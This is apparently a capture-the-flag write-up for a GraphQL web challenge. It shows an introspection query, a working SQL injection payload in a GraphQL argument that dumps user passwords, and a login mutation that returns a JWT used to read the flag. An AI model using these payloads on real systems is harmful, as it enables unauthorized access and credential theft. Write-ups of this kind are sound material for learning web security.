Tags: sqlite web graphql
Rating: 4.0
After we started searching, we found GraphQL on /graphql.
With big payload from PayloadsAllTheThings we can get all the information out of it.
For convenience, we can use "GraphQL Voyager" extension in Burpsuite.
Request:
```
{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null}
```
The information we received from the response we can put to https://apis.guru/graphql-voyager/ and get an easy-to-view graph.
In this graph we see that we have "flag" query.
Let's try to send a request:
```
query {
flag
}
```
But we get in response:
```
"message":"error authenticating user: invalid token"
```
After spending a lot of time on Google and looking for information about GraphQL, and sending a large number of requests, we found SQLite injection on post query:
```
query UserQuery{
post (name:"' union select 1,2,3,password,5,6 from users --") {
content
}
}
```
response:
```
"content":"n8bboB!3%vDwiASVgKhv"
```
From the posts on the site we found name of the author - congon4tor.
Now we have credentials congon4tor:n8bboB!3%vDwiASVgKhv
Need to get token with this credentials.
With the help of my teammate jelly7183
request:
```
query {
__schema {
types {
name,fields {
name, args {
name,description,type {
name, kind, ofType {
name, kind
}
}
}
}
}
}
}
```
response:
```
"name":"authenticateUser"
```
Now need to send request with mutation to authenticateUser.
request:
```
mutation {
authenticateUser(username:"congon4tor", password:"n8bboB!3%vDwiASVgKhv"){token}
}
```
response:
```
"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjQ5MjksImlhdCI6MTYzMTk5MjEyOSwiaXNzIjoiQ29uZ29uNHRvciJ9.ObmWd65tvTGUOIAIo1u4XmiScZE00tvA7Gu_Dtm1cpQ"
```
Great, now we have a token, it remains to form a normal request to "flag" query.
Add this header to HTTP request:
```
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjE1NzIsImlhdCI6MTYzMTk4ODc3MiwiaXNzIjoiQ29uZ29uNHRvciJ9.Gqllh1rt_OHVcTWMfRREZy0pKPRxhlsvxQFw6Wu0rxE
```
and set
```
query {
flag
}
```
and we have flag in response:
```
"flag":"flag{9d26b6e4a765ecd87fe03a1494c22236}"
```
very nice!!!! ???
